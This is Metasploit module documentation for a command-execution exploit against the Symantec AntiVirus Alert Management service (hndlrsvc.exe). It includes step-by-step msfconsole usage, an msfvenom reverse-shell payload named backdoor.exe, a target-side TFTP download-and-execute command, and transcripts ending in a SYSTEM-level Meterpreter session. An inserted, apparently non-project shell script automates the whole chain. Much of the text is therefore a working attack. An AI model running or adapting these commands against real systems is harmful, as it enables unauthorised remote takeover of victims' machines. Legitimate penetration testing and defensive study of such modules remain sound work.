GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/antivirus/ams_hndlrsvc.md

Vulnerable Application

This module exploits a command-execution weakness in the Alert Management System service (hndlrsvc.exe) of Symantec System Center, which ships with Symantec AntiVirus Corporate Edition 8.0 through 10.1.7. The service accepts a command to run, and the module uses that to have the target download the payload from the attacker's TFTP server and then execute it. Because hndlrsvc.exe runs as a service, the resulting session runs as NT AUTHORITY\SYSTEM (see the transcripts below).

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/antivirus/ams_hndlrsvc

  4. Do: set RHOST [target IP]

  5. Do: exploit

  6. You should get a Meterpreter session running as NT AUTHORITY\SYSTEM.

Options

CMD

Optional command to execute on the target instead of the module's default behaviour of staging the payload over TFTP and running it. The command runs in the context of the hndlrsvc.exe service.

RPORT

The port the service is running on. Default is 38292.

Scenarios

Manual Upload and Execute

If the module does not return a shell, you can reproduce its two steps by hand: run the module twice with different CMD values, once to download a payload over TFTP and once to execute it. Note that the Windows tftp.exe client used here is present by default only on older Windows versions (on Vista and later it is an optional feature that must be enabled), which matters little for the XP/2003-era targets this product shipped on but will break the manual scenario on anything newer.

  1. Start a TFTP server serving the payload directory: atftpd --daemon --port=69 /tftpboot/

  2. Create the payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f exe -o /tftpboot/backdoor.exe

  3. Start Metasploit

  4. Start a multi/handler for the same payload, LHOST and LPORT used in step 2

  5. Load the module: use exploit/windows/antivirus/ams_hndlrsvc

  6. In the module, set the download command: set CMD 'tftp -i 1.1.1.1 GET backdoor.exe'

  7. run

  8. In the module, set the execute command: set CMD 'backdoor.exe'

  9. run
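The nine steps above, scripted as an added example that is not part of the module documentation or of the Metasploit project: a POSIX shell helper that prints the msfvenom command for step 2, emits an msfconsole resource script covering steps 3 to 9, and checks that the payload actually sits in the TFTP root before anything is launched. The addresses, ports, TFTP root and payload name are illustrative assumptions; the `sleep 5` between the two runs is my addition to give the target's TFTP transfer time to finish before the second command tries to execute the file.

```shell
#!/bin/sh
# Added example, not the module's own code. Assumed values: 1.1.1.1 (LHOST),
# 2.2.2.2 (RHOST), 4444 (LPORT), /tftpboot (atftpd root), backdoor.exe (payload).

# gen_payload_cmd LHOST LPORT TFTPROOT NAME
# Prints the msfvenom command that builds a payload matching the handler below.
gen_payload_cmd() {
    printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f exe -o %s/%s\n' \
        "$1" "$2" "$3" "$4"
}

# gen_ams_rc LHOST LPORT RHOST NAME
# Prints an msfconsole resource script (run with: msfconsole -r file.rc) that
# starts the handler as a background job, then runs ams_hndlrsvc twice:
# first to fetch NAME over TFTP, then to execute it.  The handler must use the
# same payload/LHOST/LPORT the executable was built with, otherwise the
# callback has nowhere to go.
gen_ams_rc() {
    lhost=$1; lport=$2; rhost=$3; name=$4
    cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ${lhost}
set LPORT ${lport}
exploit -j
use exploit/windows/antivirus/ams_hndlrsvc
set RHOST ${rhost}
set CMD 'tftp -i ${lhost} GET ${name}'
run
sleep 5
set CMD '${name}'
run
sessions -l
EOF
}

# check_tftp_root TFTPROOT NAME
# Returns 0 only if NAME exists under TFTPROOT, is readable and is non-empty;
# atftpd will otherwise answer the target's GET with an error and the second
# run will try to execute a file that never arrived.
check_tftp_root() {
    root=$1; name=$2
    [ -d "$root" ] || return 1
    [ -r "$root/$name" ] || return 1
    [ -s "$root/$name" ] || return 1
    return 0
}

# Usage: sh ams_manual.sh LHOST LPORT RHOST TFTPROOT NAME > ams.rc
# Prints the msfvenom command on stderr (run it first), then the resource
# script on stdout.  Invoked with no arguments it only defines the functions.
if [ $# -ge 5 ]; then
    gen_payload_cmd "$1" "$2" "$4" "$5" >&2
    if check_tftp_root "$4" "$5"; then
        gen_ams_rc "$1" "$2" "$3" "$5"
    else
        echo "payload $5 not found in $4; build it with the command above" >&2
        exit 1
    fi
fi
```

Run the printed msfvenom command and start atftpd on the TFTP root before feeding the resource script to msfconsole; the script deliberately ends with `sessions -l`, because the session opens on the background handler rather than on the module's own listener and the module's final status line will not reflect it.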

```
root@kali:~/metasploit-framework# ./msfconsole
msf > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 1.1.1.1  netmask 255.255.255.0  broadcast 192.168.3.255
        inet6 fe80::20c:29ff:fef9:62a1  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:f9:1f:a1  txqueuelen 1000  (Ethernet)
        RX packets 70933  bytes 39287343 (37.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11688  bytes 3788654 (3.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf > use exploit/multi/handler
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Starting the payload handler...
msf exploit(handler) > use exploit/windows/antivirus/ams_hndlrsvc
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 9999
lport => 9999
msf exploit(ams_hndlrsvc) > set cmd 'tftp -i 1.1.1.1 GET backdoor.exe'
CMD => tftp -i 1.1.1.1 GET backdoor.exe
msf exploit(ams_hndlrsvc) > run

[*] Started reverse TCP handler on 1.1.1.1:9999
[*] 2.2.2.2:38292 - Executing command 'tftp -i 1.1.1.1 GET backdoor.exe'
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > set cmd 'backdoor.exe'
cmd => backdoor.exe
msf exploit(ams_hndlrsvc) > run

[*] Started reverse TCP handler on 1.1.1.1:9999
[*] 2.2.2.2:38292 - Executing command 'backdoor.exe'
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:1038) at 2016-09-30 11:59:13 -0400
[*] Exploit completed, but no session was created.
msf exploit(ams_hndlrsvc) > sessions -l

Active sessions
===============

  Id  Type                   Information                  Connection
  --  ----                   -----------                  ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WEBB   1.1.1.1:4444 -> 2.2.2.2:1038 (2.2.2.2)

msf exploit(ams_hndlrsvc) > sessions -v

Active sessions
===============

  Session ID: 1
        Type: meterpreter x86/win32
        Info: NT AUTHORITY\SYSTEM @ WEBB
      Tunnel: 1.1.1.4:4444 -> 2.2.2.2:1038 (2.2.2.2)
         Via: exploit/multi/handler
        UUID: 0a85ec1678bc8465/x86=1/windows=1/2016-09-30T15:59:12Z
   MachineID: 8b2889ec93a961f2cc3f2db4620def57
     CheckIn: 28s ago @ 2016-09-30 12:00:15 -0400
  Registered: No

msf exploit(ams_hndlrsvc) >
```

Note that the session arrives on the background multi/handler on port 4444 (the LPORT compiled into backdoor.exe), not on the listener the module itself starts on port 9999, so the module still prints "Exploit completed, but no session was created" even though session 1 is open. In this scenario check `sessions -l` rather than trusting the module's final status line.

Using Standard Options

In this mode the module serves the payload itself over TFTP from LHOST under a random file name (here OQTAVJBVWZH.exe), so no separate atftpd is needed; if an atftpd from the manual scenario is still bound to UDP port 69 on LHOST, stop it first so the module's own TFTP server can listen.

```
msf > use exploit/windows/antivirus/ams_hndlrsvc
msf exploit(ams_hndlrsvc) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf exploit(ams_hndlrsvc) > set lport 4445
lport => 4445
msf exploit(ams_hndlrsvc) > show options

Module options (exploit/windows/antivirus/ams_hndlrsvc):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD                     no        Execute this command instead of using command stager
   LHOST  1.1.1.1          no        The listen IP address from where the victim downloads the payload
   RHOST  2.2.2.2          yes       The target address
   RPORT  38292            yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     1.1.1.1          yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf exploit(ams_hndlrsvc) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4445
[*] 2.2.2.2:38292 - Sending request to 2.2.2.2:38292
[+] 2.2.2.2:38292 - tftp -i 1.1.1.1 GET OQTAVJBVWZH.exe
[*] 2.2.2.2:38292 - Attempting to execute the payload...
[+] 2.2.2.2:38292 - OQTAVJBVWZH.exe
[*] Sending stage (957999 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4445 -> 2.2.2.2:1041) at 2016-09-30 12:13:18 -0400

meterpreter >
```